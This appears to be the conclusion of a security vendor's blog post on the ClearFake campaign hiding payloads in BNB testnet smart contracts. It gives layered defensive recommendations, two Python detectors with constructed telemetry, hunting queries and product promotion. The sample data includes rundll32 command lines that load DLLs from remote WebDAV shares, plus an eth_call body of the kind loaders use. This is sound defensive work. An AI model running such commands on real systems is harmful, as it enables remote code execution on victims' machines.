Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Conclusion
This case is a concrete demonstration that blockchain-based payload delivery has graduated from a proof-of-concept curiosity to an operational threat.
The EtherHiding technique used in this campaign removes the components of traditional malware infrastructure that are easiest to disrupt: domains, IP addresses, and hosting providers. All four smart contracts identified in this investigation remain live on the BNB Smart Chain testnet as of writing. No action by a security vendor, domain registrar, or law enforcement agency can alter or remove the payloads stored in them; that is not a shortcoming of the response but a fundamental property of immutable, decentralized infrastructure. The practical consequence is that the remaining interception points are all on the defender's own side: the RPC request the loader makes to read the contract, and the execution that follows on the endpoint. Enterprise defenders need to rethink their assumptions about what takedown-resistant C&C looks like.
We recommend enterprises implement controls across several layers:
- At the network layer, blocking outbound JSON-RPC traffic to known BNB Smart Chain testnet RPC endpoints, starting with bsc-testnet-rpc.publicnode[.]com, removes the contract query step before any payload executes. Because any public RPC provider for the same chain serves the same contract state, a loader can be repointed at an endpoint that is not on the list; treat the blocklist as a starting point and pair it with the proxy-log monitoring described below.
- At the endpoint layer, disabling the Windows WebClient service on workstations that do not need WebDAV removes the delivery mechanism for the remote DLL loader: WebClient is the WebDAV redirector, so without it Windows cannot resolve an HTTP-backed UNC path and the rundll32 command fails before anything is fetched. Where WebClient cannot be disabled, behavioral detection rules that flag rundll32.exe launched with a UNC path argument (\\host\share\..., or the explicit WebDAV forms \\host@80\DavWWWRoot\... and \\host@SSL@443\DavWWWRoot\...) are highly effective, since legitimate rundll32 use normally names a local DLL.
- At the browser layer, enterprise browser management policies that restrict clipboard write access for untrusted sites can interrupt the ClickFix social engineering step before the victim pastes and runs the injected command. Organizations should also consider blocking or alerting on eth_call and other JSON-RPC request patterns in web proxy logs as an early-warning indicator for EtherHiding activity across their fleet. Note that the JSON-RPC method name travels in the HTTPS POST body, so this check needs TLS inspection at the proxy; where that is not available, fall back to the destination hostname and DNS telemetry.
- At the end-user layer, awareness training on fake CAPTCHA and ClickFix lures is the first line of defense against the social engineering component; the entire post-infection chain in this case hinged on a single deliberate action by the victim.
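The network- and proxy-layer checks from the first and third recommendations, as an added example that is not part of the original post: a small Python detector run over constructed DNS and web-proxy events. It flags (1) DNS resolution of a known BSC testnet RPC host, rated high when the source is a browser and informational otherwise (the web3-developer noise the hunting query later in this post mentions), (2) any proxied request to such a host regardless of process, and (3) a browser sending an eth_call-family JSON-RPC body to any host, which catches a loader pointed at an RPC provider missing from the blocklist but only sees anything where the proxy decrypts TLS. The event format, the second RPC host, the endpoint and destination names, and the zero contract address in the sample body are constructed placeholders, not indicators from the investigation.

```python
"""Added example: network-layer detection of EtherHiding contract lookups.

Runs over constructed DNS and web-proxy events (one dict per event); the
format, the second RPC host and the zero contract address are assumptions
for illustration, not indicators from the investigation.
"""
from __future__ import annotations

import json
from urllib.parse import urlsplit

# Known BSC testnet RPC host named in the post, plus a placeholder (assumed)
# for any other public testnet RPC provider an organisation wants to cover.
KNOWN_BSC_TESTNET_RPC_HOSTS = {
    "bsc-testnet-rpc.publicnode.com",
    "bsc-testnet.rpc-provider.invalid",  # assumption: replace with real providers
}

# Browser images used as the source filter in the post's hunting query.
BROWSER_PROCESSES = {
    "chrome.exe", "msedge.exe", "microsoftedge.exe", "firefox.exe",
    "iexplore.exe", "opera.exe", "brave.exe", "vivaldi.exe", "waterfox.exe",
}

# JSON-RPC methods that read contract state; eth_call is the one an
# EtherHiding loader uses to fetch the payload from a view function.
CONTRACT_READ_METHODS = {"eth_call", "eth_getStorageAt", "eth_getCode"}


def jsonrpc_methods(body: str | None) -> set[str]:
    """Return the method names in a JSON-RPC body (single object or batch)."""
    if not body:
        return set()
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return set()
    calls = payload if isinstance(payload, list) else [payload]
    return {c["method"] for c in calls
            if isinstance(c, dict) and isinstance(c.get("method"), str)}


def evaluate(event: dict) -> list[dict]:
    """Apply the three rules to one DNS or proxy event and return its alerts."""
    alerts = []
    proc = event.get("process", "").lower()
    base = {"endpoint": event["endpoint"], "process": proc}

    if event["type"] == "dns":
        if event["query"].lower().rstrip(".") in KNOWN_BSC_TESTNET_RPC_HOSTS:
            # Developer tooling resolving the same host is expected noise.
            severity = "high" if proc in BROWSER_PROCESSES else "info"
            alerts.append({**base, "rule": "dns_bsc_testnet_rpc",
                           "severity": severity, "detail": event["query"]})

    elif event["type"] == "proxy":
        dest = (urlsplit(event["url"]).hostname or "").lower()
        if dest in KNOWN_BSC_TESTNET_RPC_HOSTS:
            alerts.append({**base, "rule": "proxy_bsc_testnet_rpc",
                           "severity": "high", "detail": dest})
        # Body inspection only sees the method when the proxy decrypts TLS;
        # it catches loaders pointed at RPC providers missing from the list.
        hit = jsonrpc_methods(event.get("body")) & CONTRACT_READ_METHODS
        if proc in BROWSER_PROCESSES and hit:
            alerts.append({**base, "rule": "browser_contract_read",
                           "severity": "high",
                           "detail": f"{','.join(sorted(hit))} -> {dest}"})
    return alerts


def scan(events: list[dict]) -> list[dict]:
    """Evaluate every event in order and return the flat list of alerts."""
    return [alert for event in events for alert in evaluate(event)]


# Constructed telemetry: endpoint names, the unknown provider and the zero
# address are placeholders.
ETH_CALL_BODY = json.dumps({
    "jsonrpc": "2.0", "id": 1, "method": "eth_call",
    "params": [{"to": "0x" + "00" * 20, "data": "0x"}, "latest"],
})
SAMPLE_EVENTS = [
    {"type": "dns", "endpoint": "WS-101", "process": "chrome.exe",
     "query": "bsc-testnet-rpc.publicnode.com"},
    {"type": "dns", "endpoint": "DEV-07", "process": "node.exe",
     "query": "bsc-testnet-rpc.publicnode.com"},
    {"type": "proxy", "endpoint": "WS-101", "process": "chrome.exe",
     "url": "https://bsc-testnet-rpc.publicnode.com/", "body": ETH_CALL_BODY},
    {"type": "proxy", "endpoint": "WS-102", "process": "msedge.exe",
     "url": "https://www.example.com/", "body": None},
    {"type": "proxy", "endpoint": "WS-103", "process": "firefox.exe",
     "url": "https://rpc.other-provider.invalid/", "body": ETH_CALL_BODY},
    {"type": "proxy", "endpoint": "WS-104", "process": "brave.exe",
     "url": "https://rpc.other-provider.invalid/",
     "body": json.dumps([{"jsonrpc": "2.0", "id": 2,
                          "method": "eth_blockNumber", "params": []}])},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On the sample input the detector raises five alerts: the browser DNS lookup (high), the node.exe lookup (informational), the proxied request to the known host plus its eth_call body (two alerts for the same request), and the eth_call sent by firefox to a provider that is not on the list; the batched eth_blockNumber request from brave raises nothing because it does not read contract state.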
TrendAI Vision One™ provides the cross-layer detection and investigation capability that enabled this case to be fully reconstructed. The platform's endpoint sensor captured the complete execution chain, from the initial rundll32 launch through remote thread injection, dllhost spawning, and Python RAT file drops, correlating each event across process, file, and network telemetry in a single unified view.
TrendAI™ Managed Detection and Response (MDR) provides 24/7 expert-led threat monitoring and response backed by TrendAI™ global threat intelligence. In this analysis, TrendAI™ MDR analysts pivoted from a single high-confidence endpoint alert to a full reconstruction of the chain, from the blockchain delivery infrastructure to the SectopRAT payload.
TrendAI Vision One™ Threat Intelligence Hub
TrendAI Vision One™ Threat Intelligence Hub provides the latest insights on emerging threats and threat actors, exclusive strategic reports from TrendAI™ Research, and TrendAI Vision One™ Threat Intelligence Feed in the TrendAI Vision One™ platform.
Emerging Threats: Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
TrendAI Vision One™ Intelligence Reports (IOC Sweeping)
Hunting Queries
eventSubId: 301 AND hostName:bsc-testnet-rpc.publicnode.com AND processName:(chrome.exe OR msedge.exe OR microsoftedge.exe OR firefox.exe OR iexplore.exe OR opera.exe OR brave.exe OR vivaldi.exe OR waterfox.exe)
Detects a DNS query from a common browser process to the Binance Smart Chain testnet RPC endpoint, an indication that the user browsed a compromised website carrying the ClearFake-embedded JavaScript. Expect benign hits from users developing web3 applications; scope the query to non-developer hosts or tune it accordingly.
eventSubId: 701 AND parentName:rundll32.exe AND parentCmd:\*** AND objectCmd:(chrome.exe OR msedge.exe OR microsoftedge.exe OR firefox.exe OR iexplore.exe OR opera.exe OR brave.exe OR vivaldi.exe OR waterfox.exe)
Detects injection into a common browser process originating from the execution of a malicious DLL hosted on a remote WebDAV UNC path, with rundll32.exe as the parent process.
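The rundll32-with-UNC-path rule from the endpoint recommendation and the query above, as an added example that is not part of the original post: a Python classifier run over constructed process-creation events. It recognizes the plain UNC form, the explicit WebDAV forms (\\host@80\... and \\host@SSL@443\...) and the DavWWWRoot alias, and reports which transport the module load would use. Plain \\host\share paths are labelled SMB-or-WebDAV-fallback because the Windows redirector tries SMB first and falls back to WebClient when SMB is unavailable, which is exactly the path an egress-filtered workstation takes. Host names, addresses, DLL names and export names in the sample are constructed.

```python
"""Added example: classify rundll32 launches that load a module from a UNC path.

Runs over constructed process-creation events; hosts, addresses, DLL names
and export names are placeholders, not indicators from the investigation.
"""
from __future__ import annotations

import ntpath
import re

# UNC module path as rundll32 receives it.  "@SSL" and "@<port>" are the
# Windows WebDAV redirector's explicit-transport syntax, e.g.
# \\host@SSL@443\DavWWWRoot\x.dll; DavWWWRoot is its root alias.
UNC_RE = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9._-]+)(?P<ssl>@SSL)?(?P<port>@\d{1,5})?"
    r"\\(?P<path>[^\s\",]+)",
    re.IGNORECASE,
)

RUNDLL32_IMAGES = {"rundll32.exe", "rundll32"}


def image_name(cmdline: str) -> str:
    """Lower-cased basename of the first command-line token."""
    first = cmdline.strip().split(" ", 1)[0].strip('"')
    return ntpath.basename(first).lower()


def classify_rundll32(cmdline: str) -> dict | None:
    """Return transport, remote host, module and export for a rundll32
    command that names a UNC module, or None for anything else."""
    if image_name(cmdline) not in RUNDLL32_IMAGES:
        return None
    flat = cmdline.replace('"', "")  # quoting does not change the path
    m = UNC_RE.search(flat)
    if m is None:
        return None  # local DLL: the normal, benign case

    path = m.group("path")
    if m.group("ssl"):
        transport = "webdav-https"
    elif m.group("port"):
        transport = "webdav-http"
    elif path.lower().startswith("davwwwroot\\"):
        transport = "webdav"
    else:
        # Plain \\host\share: the redirector tries SMB first and falls back
        # to WebClient, so this is still WebDAV delivery when SMB is blocked.
        transport = "smb-or-webdav-fallback"

    # rundll32 syntax is <module>,<export> [args]; pick the export if present.
    rest = flat[m.end():]
    entry = None
    if rest.startswith(","):
        parts = rest[1:].split()
        entry = parts[0] if parts else None
    return {
        "transport": transport,
        "remote_host": m.group("host"),
        "module": ntpath.basename(path),
        "entry": entry,
    }


def scan_rundll32(events: list[dict]) -> list[dict]:
    """Attach a finding to every event whose command line is a UNC rundll32 load."""
    findings = []
    for event in events:
        finding = classify_rundll32(event["cmdline"])
        if finding:
            findings.append({"endpoint": event["endpoint"],
                             "parent": event["parent"], **finding})
    return findings


# Constructed process-creation telemetry (203.0.113.0/24 and .invalid are
# reserved for documentation, so nothing here points at a real host).
SAMPLE_PROCESS_EVENTS = [
    {"endpoint": "WS-101", "parent": "explorer.exe",
     "cmdline": r"rundll32.exe \\203.0.113.10@80\DavWWWRoot\loader.dll,Start"},
    {"endpoint": "WS-102", "parent": "cmd.exe",
     "cmdline": r'rundll32 "\\files.example.invalid@SSL@443\DavWWWRoot\update.dll",Run'},
    {"endpoint": "WS-103", "parent": "powershell.exe",
     "cmdline": r"rundll32.exe \\fileserver\share\tool.dll,Main"},
    {"endpoint": "WS-104", "parent": "explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"endpoint": "WS-105", "parent": "explorer.exe",
     "cmdline": r"cmd.exe /c dir \\fileserver\share"},
]

if __name__ == "__main__":
    for finding in scan_rundll32(SAMPLE_PROCESS_EVENTS):
        print(finding)
```

The first three sample events are flagged (explicit WebDAV over HTTP, explicit WebDAV over HTTPS, and a plain UNC share), while the shell32.dll control-panel launch and the cmd.exe directory listing are ignored; the parent process is carried along because the same rule, joined with the browser-injection query above, is what ties the loader to the ClickFix command that spawned it.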
TrendAI Vision One™ XDR Data Explorer App
TrendAI Vision One™ customers can use the XDR Data Explorer App to match or hunt for the malicious indicators mentioned in this blog post against data in their environment.
More hunting queries are available for TrendAI Vision One™ with Threat Intelligence Hub entitlement enabled.
Indicators of Compromise
Indicators of compromise can be found here.
